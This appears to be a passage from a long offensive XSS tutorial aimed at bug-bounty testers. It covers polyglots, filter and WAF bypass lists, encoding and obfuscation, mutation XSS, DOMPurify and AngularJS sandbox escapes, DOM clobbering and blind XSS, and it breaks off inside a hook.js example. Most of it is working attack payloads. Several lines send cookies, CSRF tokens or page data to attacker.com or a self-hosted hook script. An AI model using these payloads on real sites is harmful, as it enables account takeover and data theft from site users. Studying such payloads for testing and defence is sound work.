In real-world testing, you often don't immediately know which context your input lands in. A complex single-page application might process your input on the server, store it in a JSON API response, then have the client-side JavaScript pull it out and render it — and the rendering might happen in any of several contexts depending on which component handles it. A polyglot lets you fire a single test payload that will work across multiple possibilities. It also tests filters more thoroughly, because a polyglot simultaneously stresses HTML parsing, attribute parsing, and JavaScript parsing.

Let's build one from scratch, step by step: I want you to follow this construction process actively — don't just read it, trace it.

  • We want a payload that fires in at least three distinct contexts: an HTML body context, a double-quoted HTML attribute context, and a JavaScript single-quoted string context. We need to start by identifying what each context needs.
  • For the HTML body context, we need a < to transition the tokenizer out of Data state and into a tag, followed by a tag name and some execution vector. For the double-quoted attribute context, we need a " to close the attribute value first, then some execution vector. For the JavaScript single-quoted string context, we need a ' to close the string, then a statement separator, then our execution, then a comment to suppress the rest.
  • The trick with polyglots is that characters that are meaningful in one context are often harmless in another — or, more precisely, the parser in one context skips over or ignores characters that are escape sequences for another context. Here is a well-known Classic XSS Polyglot payload. Study it first.

Classic XSS Polyglot payload:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Understanding It Piece by Piece:

jaVasCript:                → Works in href, src attributes (javascript: URI)
/*-/*`/*\`/*'/*"/**/       → Attempts to close various string delimiters: ` ' "
(/* */oNcliCk=alert() )    → Injected event handler after closing JS comment
//%0D%0A%0d%0a//           → URL-encoded newlines to break out of single-line contexts
</stYle/</titLe/...        → Close various enclosing elements
\x3csVg/                   → \x3c = <, opens SVG tag
<sVg/oNloAd=alert()//>\x3e → SVG with onload handler
  • This looks overwhelming, but it's constructed deliberately. The opening jaVasCript: makes it valid as a URL scheme for href or src attributes that accept URLs — the browser normalizes casing before interpreting schemes.
  • The sequence /*-/* begins a multi-line JavaScript comment using a structure that also accounts for CSS comment syntax.
  • The backtick and various quote characters close out string contexts that the payload might have landed inside.
  • The oNcliCk=alert() is an event handler injection that works if the payload lands in an unquoted attribute or after escaping a quoted one.
  • The URL-encoded newlines %0D%0A help in contexts where a newline is needed to terminate a line comment.
  • The closing section breaks out of various tag contexts (</style>, </title>, </textarea>, </script>) that might be wrapping the injection point, and then injects an SVG element with an onload handler as the final fallback.
  • The key insight is that this payload doesn't need every part to work in every context. In a JavaScript string context, most of the HTML at the end is treated as a string that's never rendered — but the quote characters at the beginning will have already closed the string and begun execution.
  • In an HTML body context, the parser ignores the opening javascript: as text, but the <svg> near the end triggers tag parsing and the onload fires.

Polyglots are also useful as a diagnostic tool. If you inject a polyglot and something fires, you can narrow down the context by observing which part of the payload triggered.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 3: Filter Bypass Techniques — Violating the Sanitizer's Assumptions

Filters and sanitizers are written by developers who have a model of what valid and invalid input looks like. Your job as an attacker is to find inputs that the developer's model didn't account for — inputs that look safe to the sanitizer but are dangerous to the parser that processes them afterward. This gap between "what the sanitizer thinks is safe" and "what the parser actually does" is the entire attack surface for filter evasion.

1. Case Variation:

  • HTML is case-insensitive in tag names and attribute names. JavaScript event handlers defined as HTML attributes are also case-insensitive at the HTML level. So <script> and <SCRIPT> and <ScRiPt> and <sCrIpT> are all identical to the HTML parser. A naive filter that checks for the lowercase string script will miss all of these.
<!-- All of these are identical to the HTML parser -->
<SCRIPT>alert(1)</SCRIPT>
<Script>alert(1)</Script>
<sCrIpT>alert(1)</sCrIpT>

<!-- Event handlers are also case-insensitive -->
<img src=x ONERROR=alert(1)>
<img src=x OnErRoR=alert(1)>
  • The defense against this is for filters to normalize to lowercase before pattern matching. A filter that does this correctly won't be beaten by case variation alone. But case variation is always your first test because it reveals whether the developer even thought about it.

2. Null Bytes and Unusual Whitespace:

  • Some parsers and sanitizers treat null bytes (\x00) as string terminators, while the HTML parser ignores them or treats them as replacement characters. This creates a split-brain situation where the sanitizer sees scr\x00ipt as something that doesn't match script, but the HTML parser, after discarding the null byte, reconstructs script.
  • Similarly, the HTML specification allows certain whitespace characters between attributes and between a tag name and its attributes that many filters don't account for. Tab characters (\x09), newlines (\x0a), carriage returns (\x0d), and form feeds (\x0c) are all valid whitespace in HTML attribute separators:
<!-- The tab between the tag name and attribute is valid HTML -->
<img src=x onerror=alert(1)>

<!-- Newlines between attributes are valid -->
<img
src=x
onerror=alert(1)>
  • A filter that uses a regex like on\w+= to find event handlers might not account for the possibility of whitespace or other characters appearing within the attribute, or might not match across newlines.

3. Tag Substitution:

  • The <script> tag is the first thing every filter blocks. But it is far from the only way to execute JavaScript in HTML. Many filters focus so heavily on <script> that they forget the enormous ecosystem of execution-capable elements and attributes. Here are some of the alternatives, each of which works natively in modern browsers:
<!-- SVG elements support event handlers -->
<svg onload=alert(1)>
<svg><script>alert(1)</script></svg>

<!-- MathML in some browsers -->
<math><maction actiontype="statusline#" xlink:href="javascript:alert(1)">CLICK</maction></math>

<!-- Body and other structural elements have event handlers -->
<body onload=alert(1)>
<body onpageshow=alert(1)>

<!-- Input elements with autofocus force the event without user interaction -->
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>

<!-- Details and summary have a native toggle mechanism -->
<details open ontoggle=alert(1)>
<summary>Click</summary>
</details>

<!-- Video and audio elements -->
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>

<!-- The marquee element (still works in many browsers) -->
<marquee onstart=alert(1)>test</marquee>
  • Each of these works because the HTML parser processes any element's event handler attributes and the JavaScript engine executes them when the event fires. A filter that has no specific block rule for these elements will pass them through.

4. Attribute Obfuscation and Event Handler Selection

  • When filters target specific event handler names like onerror, onload, and onclick, you have a large surface of alternatives. The HTML specification defines dozens of event handlers. Many filters enumerate a blocklist of the most common ones and miss the rest. Some less commonly blocked ones include onpointerenter, onpointerover, ontransitionend, onanimationstart, onwheel, onscroll, onresize, onpaste, oncopy, oncut, onmouseover, onsearch, and many others.
<!-- These event handlers are often not in blocklists -->
<div onpointerenter=alert(1)>hover me</div>
<div ontransitionend=alert(1) style="transition:color 1s" onmouseover="this.style.color='red'">hover</div>
<input onpaste=alert(1) placeholder="paste here">
  • The ontransitionend technique is particularly elegant: you inject an element with a CSS transition and trigger the transition with a secondary onmouseover, causing the ontransitionend to fire when the transition completes. Many WAFs don't inspect for ontransitionend.
  • Event handlers that execute without user interaction are most valuable:
<!-- Fires on page load / element load: -->
<body onload=alert(1)>
<img src=valid.jpg onload=alert(1)>
<svg onload=alert(1)>
<iframe onload=alert(1)>
<link rel=stylesheet onload=alert(1) href=valid.css>

<!-- Fires on error (use invalid src): -->
<img src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<script src=x onerror=alert(1)>

<!-- Fires automatically via HTML5 autofocus: -->
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>

<!-- Fires on animation: -->
<style>@keyframes x{}</style>
<div style="animation-name:x" onanimationstart=alert(1)>

<!-- Fires when details opens (HTML5): -->
<details open ontoggle=alert(1)>

<!-- Fires on scroll: -->
<div onscroll=alert(1) style="overflow:scroll;height:100px">
<br><br><br><br><br><br><br><br><br><br>
</div>

Bypass Category 1: Tag/Keyword Blacklisting

If <script> is blocked:

<!-- Use alternative execution tags: -->
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>    <!-- deprecated but browser support exists -->
<details open ontoggle=alert(1)>
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<iframe src="javascript:alert(1)">
<math><mtext></mtext><mglyph><svg><text><tspan><tref><foreignObject><img src=x onerror=alert(1)>

Bypass Category 2: Attribute Blacklisting

If onerror, onload, etc. are blocked:

<!-- Use less-common event handlers: -->
<body onpageshow=alert(1)>
<body onhashchange=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x>
<object data="data:text/html,<script>alert(1)</script>">
<form><button formaction="javascript:alert(1)">X</button></form>

Bypass Category 3: alert is Blocked

// Alternatives that prove execution:
prompt(1)
confirm(1)
console.log(1)
eval('ale'+'rt(1)')
window['alert'](1)
window['\x61lert'](1)
top['al'+'ert'](1)
(alert)(1)

Bypass Category 4: () Parentheses Blocked

// Using tagged template literals (ES6):
alert`1`
fetch`https://attacker.com`

// Using throw:
// (requires some context manipulation)

Bypass Category 5: Case-Insensitive Filter

If filter is case-sensitive:

<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>

Bypass Category 6: Space Filtering

<!-- HTML allows tab, newline, form-feed instead of spaces: -->
<img/src=x/onerror=alert(1)>
<img src=x onerror=alert(1)>    <!-- Tab characters -->
<img
src=x
onerror=alert(1)>                    <!-- Newlines -->

Bypass Category 7: (' ") Quote Filtering

// Use backticks in JS instead of quotes:
fetch(`https://attacker.com/?c=`+document.cookie)

// String.fromCharCode:
eval(String.fromCharCode(97,108,101,114,116,40,49,41))
// = eval("alert(1)")

// Use without quotes at all in HTML attributes:
<img src=x onerror=alert(1)>   // No quotes needed here

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 4: Encoding, Obfuscation, and Evasion

Encoding is a subject where most tutorials give you a list of encoding types and call it a day. That's not what we're doing here. We're going to understand mechanically why each encoding technique works, which means understanding when the relevant decoder runs and how it interacts with the sanitizer.

The core principle that makes encoding attacks work is decoder sequencing. If a sanitizer runs before a decoder, then the sanitizer sees encoded text and the decoder later converts it to something dangerous.

The question for every encoding trick is: does the decoder that processes this type of encoding run before or after the sanitizer?

1. HTML Entity Encoding:

  • The HTML parser decodes HTML entities before passing text to the JavaScript engine. This creates an opportunity when a filter sanitizes a JavaScript context by looking for raw character patterns, but the HTML parser then decodes entities before JavaScript sees the result. Consider an injection into an event handler attribute:
<!-- All of these execute alert(1) in an event handler: -->
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src=x onerror="<-- won't work in JS context -->

<!-- In href attribute: -->
<a href="javascript:alert(1)">
<a href="java&#115;cript:alert(1)">
<a href="java&#x73;cript:alert(1)">
  • Those entities decode to alert(1). A filter that looks for the string alert in the raw HTML won't see it. But the HTML parser decodes the entities before passing the attribute value to the JavaScript engine, which then executes alert(1). The decoding happens inside the browser, after your input has passed through the filter.
  • This works specifically for event handler attributes and javascript: URLs because in both of those contexts, the HTML parser decodes entities before the JavaScript engine receives the code. It does not work inside a <script> block — the content of script tags is passed to the JavaScript engine without HTML decoding, because the HTML tokenizer is in Script data state and treats the content as opaque text.

2. URL Encoding:

  • The browser decodes URL percent-encoding when processing URLs. This matters for href, src, action, and other URL-valued attributes. A filter that scans for javascript: might miss j%61vascript: — but the browser normalizes the percent-encoding before interpreting the URL scheme. The degree to which this works depends heavily on whether the filter decodes before pattern matching, which better filters do.
  • Double URL encoding takes this further: %2522 is % then 22, which after one round of decoding becomes %22, which after a second round becomes ". This is useful in scenarios where an application decodes a URL once on the server and then uses the result in a context where it's decoded again.
javascript:alert(1)
javascript:%61lert(1)     // 'a' URL-encoded
j%61vascript:alert(1)     // Sometimes bypasses prefix checks

3. Unicode Normalization:

  • JavaScript identifiers support Unicode. Many Unicode characters, after the JavaScript engine performs Unicode normalization (specifically NFC or NFKC normalization), collapse into ASCII equivalents. This means a filter that blocks the ASCII string alert might not block a version of alert where individual characters have been replaced with their Unicode lookalikes.
  • More practically, some browsers (historically IE was the worst offender) would normalize Unicode in ways that turned otherwise-safe sequences into dangerous ones. This is the foundation of mXSS, which we'll cover shortly.
// Unicode Escapes in JavaScript
// In a JS context, these are equivalent:
alert(1)
\u0061lert(1)
\u{61}lert(1)

4. UTF Encoding:

  • This is largely a historical technique that affected Internet Explorer when servers sent responses without a Content-Type charset declaration. IE would sniff the encoding and could be tricked into interpreting a page as UTF-7, in which +ADw- decodes to < and +ADs- decodes to ;. A XSS payload in UTF-7 encoding looks like:
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
  • Modern browsers require an explicit charset declaration, but this technique appears in older write-ups and sometimes in legacy applications, so you should recognize it.

5. Base64 in Data URIs:

  • The data: URI scheme lets you embed content directly in a URL. In combination with Base64 encoding and the text/html MIME type, you can construct a URL that contains a complete HTML page with a script. If this URL ends up in an href, src, or iframe src, clicking or loading it executes the embedded JavaScript:
<!-- This data URI contains a base64-encoded HTML page with an alert -->
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  • The Base64 decodes to <script>alert(1)</script>. Whether this works depends on the browser's same-origin treatment of data: URIs (modern browsers sandbox them) and whether the context allows data: URLs. It's most relevant in older browsers and in specific iframe or object contexts.

6. Mixed Encoding:

  • The most sophisticated encoding bypass combines multiple encoding layers in the correct sequence, exploiting the fact that different decoders run at different stages of processing. For example, in a javascript: href, you can HTML-encode the characters that the sanitizer looks for, and the browser will HTML-decode the attribute value before processing the URL, which it then URL-decodes before handing to the JavaScript engine. Each layer of decoding happens at a different stage, and a sanitizer that only decodes once before pattern-matching will miss the attack.

7. JavaScript Obfuscation Techniques:

JavaScript obfuscation transforms readable code into a harder-to-understand form while preserving functionality. Here's an overview of the main techniques:

// JSFuck - encode any JS using only 6 chars: []()!+
// alert(1) in JSFuck:
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+...

// Hex encoding:
\x61\x6c\x65\x72\x74\x28\x31\x29

// Constructor-based:
(()=>{})['constructor']('alert(1)')()
Function('alert(1)')()

// toString radix tricks:
(10)['toString'](36)                // = 'a'
(34)['toString'](36) + ...          // Build 'alert' char by char

Variable & Function Renaming:

  • Replace meaningful names with short, meaningless identifiers.
// Before
function calculateTotalPrice(items, taxRate) {
  return items.reduce((sum, item) => sum + item.price, 0) * (1 + taxRate);
}

// After
function _0x3f(a, b) {
  return a.reduce((_c, _d) => _c + _d.p, 0) * (1 + b);
}

String Encoding & Encryption

  • Hide string literals using encoding schemes.
// Before
console.log("Hello, World!");

// After (Base64 / charCode arrays)
console.log(atob("SGVsbG8sIFdvcmxkIQ=="));

// Or using charCode array
console.log(String.fromCharCode(72,101,108,108,111,44,32,87,111,114,108,100,33));

String Array Mapping

  • Store all strings in a central array and reference by index.
// Obfuscated
var _s = ["log", "Hello", "World"];
console[_s[0]](_s[1] + ", " + _s[2]);

Control Flow Flattening

  • Restructure logic into a switch inside a while loop, hiding the original execution order.
// Before
function greet(name) {
  const msg = "Hello, " + name;
  console.log(msg);
  return msg;
}

// After
function greet(name) {
  var _step = "0|1|2".split("|"), _i = 0;
  while (true) {
    switch (_step[_i++]) {
      case "0": var msg = "Hello, " + name; continue;
      case "1": console.log(msg); continue;
      case "2": return msg;
    }
    break;
  }
}

Dead Code Injection

  • Insert unreachable or meaningless code to confuse readers.
function _noise() {
  if (false) { var x = Math.random() * 99; x++; }
  var _junk = [1,2,3].map(n => n * 0);
}
// Sprinkled throughout to bloat and confuse

Eval-Based Execution

  • Encode the entire script and execute it via eval.
eval(atob("Y29uc29sZS5sb2coJ0hlbGxvIScpOw=="));
// Decodes and runs: console.log('Hello!');

Property Access Obfuscation

  • Replace dot notation with computed bracket notation.
// Before
console.log("test");
window.location.href = "/";

// After
window["con"+"sole"]["l"+"og"]("test");
window["loca"+"tion"]["hr"+"ef"] = "/";

Number & Boolean Obfuscation

  • Replace literals with equivalent expressions.
// Before
let x = 1;
let flag = true;

// After
let x = +![];          // 1
let flag = !![];       // true
let zero = +[];        // 0
let two = +![] + +![]; // 2 (infamous JSFuck style)

Self-Defending Code

  • Code that detects tampering or formatting attempts and breaks itself.
// Checks if the function has been reformatted/modified
(function() {
  var check = function() {
    var fn = check.toString();
    if (fn.indexOf("check") === -1) { throw new Error(); }
  };
  check();
})();

Key Takeaway

Obfuscation is not security — it raises the bar for reverse engineering but doesn't prevent it. Determined attackers can always deobfuscate client-side JS. Use it alongside server-side validation, auth, and proper secrets management.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 5: SVG, MathML, and Template Injection

1. SVG (Scalable Vector Graphics):

  • SVG is an XML-based format that browsers render as part of the DOM. It has its own scripting capabilities:
<!-- Basic SVG XSS -->
<svg><script>alert(1)</script></svg>
<svg onload=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>

<!-- SVG with use tag + external resource (now largely blocked) -->
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x">

<!-- SVG inside HTML vs XML context behaves differently -->
<!-- In HTML context: -->
<svg>
  <foreignObject>
    <div xmlns="http://www.w3.org/1999/xhtml">
      <script>alert(1)</script>
    </div>
  </foreignObject>
</svg>
  • Why SVG is special for bypass ?: SVG has its own namespace and parser. Sanitizers that work on HTML may not correctly handle SVG's XML-based parsing rules.

2. MathML:

<math>
  <mtext>
    </mtext>
    <mglyph>
      <svg>
        <script>alert(1)</script>
      </svg>
    </mglyph>
  </mtext>
</math>

<!-- MathML namespace confusion exploits -->
<math><mtext><table><mglyph><style></mtext><img src=x onerror=alert(1)></style>

3. Server-Side Template Injection (SSTI) → XSS Bridge:

When server-side templates render user input, SSTI can lead to XSS. This is a different class of vulnerability but often produces XSS as a symptom:

# Jinja2 (Python/Flask):
Input: {{7*7}}
Output: 49         ← Template evaluated!

# For XSS via SSTI:
{{"".__class__.__mro__[1].__subclasses__()}}
# → Escalates to RCE, not just XSS

# Angular template injection (client-side):
{{constructor.constructor('alert(1)')()}}

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 6: DOM Clobbering

DOM Clobbering is one of the most sophisticated XSS techniques. It exploits the fact that HTML elements with id or name attributes automatically create properties on the window or document object.

The Core Mechanic:

<!-- Named HTML elements become window properties: -->
<input id="username">
<script>
  console.log(window.username); // Returns the <input> element!
  console.log(username);        // Same — global lookup falls back to window
</script>

Exploiting DOM Clobbering:

Consider this vulnerable code pattern:

// Application code uses a config object:
let config = window.config || {};
let sinkUrl = config.scriptUrl || '/default.js';
document.querySelector('#loader').src = sinkUrl;

An attacker can inject:

<a id="config"><a id="config" name="scriptUrl" href="javascript:alert(1)">
  • window.config → the <a id="config"> element (HTMLCollection)
  • window.config.scriptUrl → the second <a> element's value → "javascript:alert(1)"

More Complex DOM Clobbering:

<!-- Clobber nested properties with form + input: -->
<form id="x"><input id="y" value="javascript:alert(1)"></form>

<!-- Now: window.x.y → input element, window.x.y.value → "javascript:alert(1)" -->

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 7: Mutation XSS (mXSS) — When the Browser Itself Creates the Vulnerability

This is one of the most subtle and fascinating XSS classes, because the vulnerability isn't in the server's code and it isn't in the application's JavaScript — it's in the browser's HTML serialization and re-parsing behavior. Understanding it requires you to think carefully about the difference between the DOM and its string representation.

The core mechanism:

  • Many sanitizer libraries work by parsing a string of HTML into a DOM tree, removing dangerous elements and attributes from the tree, and then serializing the cleaned tree back into a string using innerHTML or a similar serialization method. The assumption is that the serialized output is equivalent to the parsed input — that nothing dangerous can be introduced by the round-trip. Mutation XSS breaks this assumption.
  • The key insight is that the HTML parser is more permissive than the serializer is strict. The parser can accept certain malformed or ambiguous HTML structures and build a DOM tree from them. When that DOM tree is serialized back to HTML, the serialized form — generated by the browser's own serializer — may not match the original input. And in some cases, the serialized output contains a structure that, when parsed a second time, produces a different DOM tree that includes executable JavaScript.
  • Let me make this concrete. Consider a sanitizer that takes input, parses it into a DOM tree to clean it, and then reads element.innerHTML to get the cleaned HTML string. Here's a classic mXSS vector that exploited this in older versions of browser engines:
<!-- Attacker input: a malformed table structure containing a script-like element -->
<table><tbody><tr><td><noscript><p></noscript><img src=x onerror=alert(1)></td></tr></tbody></table>

What happens is this ?:

  • The parser sees the <noscript> element. In a context where scripting is disabled, the content of <noscript> is parsed as HTML. In a context where scripting is enabled, the content of <noscript> is treated as raw text (similar to script data state).
  • Depending on which mode the sanitizer's parser runs in versus what mode the actual page's parser runs in, the <img onerror> element may be inert during sanitization but then active when the sanitized HTML is rendered on the page.
  • A more direct example of the serialization mutation issue involves namespace-switching between HTML and SVG/MathML. The content model rules differ significantly between HTML mode and SVG mode. An element that's a CDATA section in SVG namespace becomes raw text in HTML namespace. Consider:
<!-- Inside an SVG context, this is CDATA (safe) -->
<svg><script>alert(1)</script></svg>

<!-- But inside HTML, <title> content is raw text (also safe on its own) -->
<!-- However, when parsed in SVG namespace and then serialized back: -->
<svg><title><a href="</title><img onerror=alert(1)>
  • The SVG parser in namespace mode might parse this differently than the HTML serializer re-emits it, producing a mutation. The sanitizer sees a safe tree. The serialized output, parsed a second time by the HTML parser, reconstructs a dangerous tree.

Why this matters for you ?:

  • You will encounter sanitizer libraries in real applications. Knowing that mXSS exists means you know to probe for it by testing inputs that play with namespace switches, table parsing contexts, and elements like <noscript>, <template>, <textarea>, and <title> that have unusual content parsing rules. Tools like DOMPurify have been hardened against many known mXSS vectors, but new ones are still discovered in browser engines and sanitizer implementations. Finding a new mXSS is a high-severity, often novel finding.

How It Works ?:

Attacker Input  →  Sanitizer  →  "Safe" HTML String  →  innerHTML  →  Browser Parses  →  MUTATION  →  XSS

The Key Insight:

When you assign a string to innerHTML, the browser's HTML parser processes it. The resulting DOM may be different from what you set. This is "mutation."

Exploitation:

Classic mXSS Example

<!-- Input to sanitizer: -->
<listing><img title="</listing><img src=x onerror=alert(1)>">

<!-- Sanitizer sees: an <img> tag with a title attribute. Looks safe. Allows it. -->
<!-- Sanitizer outputs: <listing><img title="</listing><img src=x onerror=alert(1)>"> -->

<!-- Browser's HTML parser: -->
<!-- Inside <listing> (raw text element in HTML4), </listing> actually CLOSES the tag -->
<!-- Result in DOM:
  <listing></listing>
  <img title="
  <img src=x onerror=alert(1)>
     ↑ This second img is now IN THE DOM and executes!
-->

mXSS via Namespace Confusion

<!-- Input: -->
<svg></p><style><a id="</style><img src=x onerror=alert(1)>">

<!-- Browser behavior differs between HTML parser and SVG (XML) parser -->
<!-- When innerHTML is set and re-parsed, context switches cause mutation -->

DOMPurify and mXSS

Multiple DOMPurify bypasses have been discovered via mXSS. The library authors play a continuous cat-and-mouse game with the browser's mutation behavior.

Known bypass (patched in DOMPurify 2.0.1):
<svg><p><style><g title="</style><img src=x onerror=alert(1)>">

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 8: Client-Side Template Injection (CSTI) — When Templates Execute Your Input

Client-side template injection occurs when a client-side JavaScript template engine evaluates user-controlled input as a template expression rather than as plain text. The distinction matters because template expressions are executed by the template engine's sandbox — and sandbox escapes lead to arbitrary JavaScript execution.

1. The Angular Template Injection — The Classic Case:

  • AngularJS (the original version 1.x) used double curly brace syntax {{ expression }} for template interpolation, and it would scan the DOM for these patterns and evaluate them as Angular expressions. The critical vulnerability was that Angular's expression evaluator was sandboxed, but the sandbox had escape vectors discovered by researchers.
  • If an application inserted user input directly into the page and Angular was processing the page as a template, injecting {{ 7 * 7 }} would produce 49 on the page — proving that template evaluation was running on your input. From there, you'd work toward a sandbox escape.
  • The sandbox escape evolved as Angular patched each discovered vector. Here's a representative one from AngularJS 1.5.x to illustrate the concept:
// AngularJS sandbox escape — this executes arbitrary JS through the template engine
{{
    constructor.constructor('alert(1)')()
}}

// If an app constructs Angular templates dynamically:
Input: {{constructor.constructor('alert(1)')()}}

// In AngularJS (1.x):
{{$on.constructor('alert(1)')()}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}

The logic is:

  • constructor on any Angular expression object gives you the constructor function of that object. constructor.constructor on that gives you Function — the global Function constructor that creates executable functions from strings. ('alert(1)')() creates a function that calls alert(1) and immediately invokes it. This escapes the sandbox entirely.
  • Angular has strong built-in sanitization but has its own dangerous patterns:
// DANGEROUS — bypassSecurityTrustHtml:
import { DomSanitizer } from '@angular/platform-browser';

@Component({
  template: `<div [innerHTML]="trustedHtml"></div>`
})
export class MyComponent {
  trustedHtml: SafeHtml;
  
  constructor(private sanitizer: DomSanitizer) {
    // This bypasses Angular's sanitizer!
    this.trustedHtml = this.sanitizer.bypassSecurityTrustHtml(userInput);
  }
}

// Also dangerous:
bypassSecurityTrustScript()
bypassSecurityTrustUrl()
bypassSecurityTrustResourceUrl()
bypassSecurityTrustStyle()

// Angular template injection (server-side rendering or template compilation):
{{constructor.constructor('alert(1)')()}}

2. Vue.js Template Injection:

  • Vue has a similar surface. The v-html directive is essentially innerHTML — it renders raw HTML and is the direct DOM XSS vector. But more subtle is when user input ends up inside a Vue template that's compiled at runtime, or when a developer uses new Vue({ template: userInput }).
// If an application does this (which is a serious mistake):
new Vue({
    template: '<div>' + userControlledInput + '</div>'
});

// An attacker can inject Vue template syntax that escapes to JS:
// Input: {{ constructor.constructor('alert(1)')() }}

// DANGEROUS — v-html directive:
<div v-html="userContent"></div>  // No escaping!

// DANGEROUS — render functions with user data:
render(h) {
    return h('div', { domProps: { innerHTML: userInput } }); // XSS
}

// DANGEROUS — $el.innerHTML assignment in lifecycle hooks

// SAFE:
<div>{{ userContent }}</div>  // Auto-escaped

3. React.js Template Injection:

  • React escapes content by default when using JSX — but has explicit escape hatches:
// SAFE — React escapes this:
const UserGreeting = ({ name }) => <div>Hello, {name}!</div>

// DANGEROUS — dangerouslySetInnerHTML bypasses all escaping:
const UserContent = ({ html }) => (
    <div dangerouslySetInnerHTML={{ __html: html }} />
);

// DANGEROUS — href can accept javascript: URIs:
const Link = ({ url }) => <a href={url}>Click</a>
// If url = "javascript:alert(1)", React renders this as-is (React 16)
// React 17+ encodes javascript: in href but NOT in all contexts

// DANGEROUS — eval/Function usage:
const DynamicComponent = ({ code }) => {
    const result = eval(code); // Never do this
};
  • React-Specific Finding: Client-Side Routing
// React Router can reflect URL data:
import { useParams, useSearchParams } from 'react-router-dom';

function UserPage() {
    const { username } = useParams();
    // If username is used in dangerouslySetInnerHTML downstream...
    return <UserProfile data={fetchUser(username)} />;
}

How to identify CSTI in the wild ?:

  • Your canary for CSTI is a mathematical expression: inject {{7*7}} and observe the output. If the page renders 49, the template engine is evaluating your input. If it renders {{7*7}} literally, it's not. Also test ${7*7} for ES6 template literal contexts, and <%= 7*7 %> for ERB-style templating. Each different output tells you something different about the engine being used.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 9: Advanced Vectors in Modern Applications

1. CSS Injection → Data Exfiltration:

  • While not direct XSS, CSS injection can exfiltrate data (useful when XSS is blocked):
/* Exfiltrate CSRF token character by character: */
input[name=csrf_token][value^=a] { background: url('https://attacker.com/x?v=a'); }
input[name=csrf_token][value^=b] { background: url('https://attacker.com/x?v=b'); }
/* ... generate for all possible chars */

2. Prototype Pollution → XSS:

  • Prototype pollution vulnerabilities in libraries can create XSS sinks:
// Vulnerable library code:
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}

// Attacker input as JSON:
{"__proto__": {"innerHTML": "<img src=x onerror=alert(1)>"}}

// Later in application code:
element[someProperty] = value;
// If someProperty lands on a polluted prototype chain entry...

3. WebSocket XSS:

// Vulnerable code:
const ws = new WebSocket('wss://victim.com/chat');
ws.onmessage = (event) => {
    document.getElementById('chat').innerHTML += event.data; // SINK
};

// Attack: Control WebSocket messages → XSS payload
// Vector: MitM if not WSS, or server-side injection into WS messages

4. Dangling Markup Injection:

  • When you can't execute JS but can inject HTML, you can exfiltrate data via dangling markup:
<!-- If XSS is blocked but HTML injection is possible: -->
<img src="https://attacker.com/?data=
<!-- This img tag is left "open", the browser continues parsing until it finds a quote -->
<!-- Any text (including CSRF tokens, secret values) between here and the next quote -->
<!-- becomes part of the src URL and is sent to attacker! -->

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 10: Blind XSS — When Your Payload Fires Somewhere You Can't See

Blind XSS is one of the highest-value attack techniques in real bug bounty work, and it's conceptually elegant: you inject a payload into an input that you can't directly observe — a contact form, a support ticket, a feedback field, a log viewer — and you design the payload to call back to your server when it executes, wherever and whenever that might be.

Why Blind XSS exists ?:

  • Consider a customer support application. A user fills out a support form. The data goes into a database. A support agent logs into the admin panel and views the ticket. The admin panel renders the stored data. If the rendering is unsanitized, the XSS fires in the admin's browser — a browser that the attacker has no visibility into. The attacker never sees the admin panel. They just have to trust that their payload will reach it eventually.
  • The payload for blind XSS must be self-contained and must exfiltrate data back to you, because you can't see the browser console. It needs to do several things: execute reliably, collect useful information about the page it's running in (cookies, current URL, page HTML, localStorage contents), and send that data to a server you control without triggering browser security restrictions. A simple example:
// A basic blind XSS callback payload
// This loads an external script from your server, which then runs in the victim's context
// The loaded script can be far more sophisticated than what you'd inject inline
<script src="https://your-server.com/hook.js"></script>
  • The hook.js file on your server contains the actual payload — it can be as complex as you want, without the constraints of fitting inside an HTML attribute. When it executes in the victim's browser, it might do something like this:
// hook.js — executes in the victim's browser (your controlled server)
(function() {
    // Collect everything useful from the current page context
    const data = {
        url: window.location.href,           // Which admin page are we on?
        cookies: document.cookie,            // Any non-HttpOnly cookies
        localStorage: JSON.stringify(localStorage), // Stored tokens, preferences
        html: document.documentElement.outerHTML,   // The full page HTML
        timestamp: new Date().toISOString()
    };
    
    // Exfiltrate via an image request (works even with restrictive CSPs
